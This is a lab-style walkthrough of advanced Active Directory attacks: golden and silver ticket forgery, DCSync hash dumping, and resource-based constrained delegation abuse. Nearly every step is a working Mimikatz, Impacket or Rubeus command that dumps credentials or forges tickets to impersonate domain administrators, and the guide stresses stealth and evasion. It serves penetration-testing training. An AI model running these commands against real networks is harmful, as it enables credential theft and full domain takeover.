Active Directory Attack Lab Walkthrough – Part 2: Golden Tickets, Silver Tickets, DCSync, and RBCD

This guide builds on Part 1 and walks you through more advanced, high-impact techniques in Active Directory exploitation. These are techniques used to maintain persistence, move laterally with stealth, and access sensitive data without triggering typical defenses.

Goal: Forge a TGT (Ticket Granting Ticket) to impersonate any user in the domain, including domain admins.

What You Need:

  • The NTLM hash of the krbtgt account (can be dumped via Mimikatz or DCSync)
  • The domain name
  • The SID of the domain

Steps:

  1. Dump the krbtgt hash:
lsadump::lsa /inject /name:krbtgt
  1. Build a golden ticket with Mimikatz:
kerberos::golden /user:Administrator /domain:security.local /sid:S-1-5-21-XXXX /krbtgt:<krbtgt_hash> /id:500 /ptt
  1. Confirm ticket injection:
kerberos::list
  1. Use the ticket to access privileged resources:
dir \\dc.security.local\C$

Goal: Forge a TGS (Ticket Granting Service) to access a specific service on a specific machine without contacting the DC.

What You Need:

  • The NTLM hash of the service account
  • SPN for the service
  • FQDN and hostname of the target server

Steps:

  1. Get SPNs for service accounts:
Get-DomainUser -SPN
  1. Use Mimikatz to create a silver ticket:
kerberos::golden /user:svc-account /domain:security.local /sid:S-1-5-21-XXXX /rc4:<NTLM_hash> /service:cifs /target:server.security.local /ptt
  1. Verify ticket:
kerberos::list
  1. Use access:
dir \\server.security.local\C$

Goal: Simulate domain replication to dump password hashes for any user in the domain.

What You Need:

  • Membership in a group with replication rights (Domain Admin, Enterprise Admin, or equivalent ACL rights)

Steps (Mimikatz):

lsadump::dcsync /domain:security.local /user:krbtgt
lsadump::dcsync /domain:security.local /user:Administrator

Steps (Impacket secretsdump):

secretsdump.py SECURITY.LOCAL/Administrator:'Password'@dc.security.local

Goal: Configure a computer account to impersonate users to a service (e.g., domain controller) by abusing delegation settings.

What You Need:

  • Low-privileged access
  • The ability to create or control a computer account (AddComputer.py or similar)
  • GenericWrite or WriteOwner rights over the target machine account

Steps:

  1. Add a new computer account:
python3 addcomputer.py -dc-ip 10.0.0.1 -computer-name CLIENT01$ -computer-pass 'Password123!' -domain security.local -u user -p userpass
  1. Set RBCD permissions using Set-ADComputer or Powermad:
Set-ADComputer -Identity TARGETSERVER$ -PrincipalsAllowedToDelegateToAccount CLIENT01$
  1. Forge a ticket with S4U2Self + S4U2Proxy:
Rubeus.exe s4u /user:CLIENT01$ /rc4:<ntlm_hash> /impersonateuser:Administrator /msdsspn:cifs/dc.security.local /domain:security.local /ptt
  1. Use ticket:
dir \\dc.security.local\C$

Each of these techniques allows for stealthy lateral movement or full domain compromise, often without triggering typical alerts. They are essential skills for advanced Active Directory exploitation.

Scroll to Top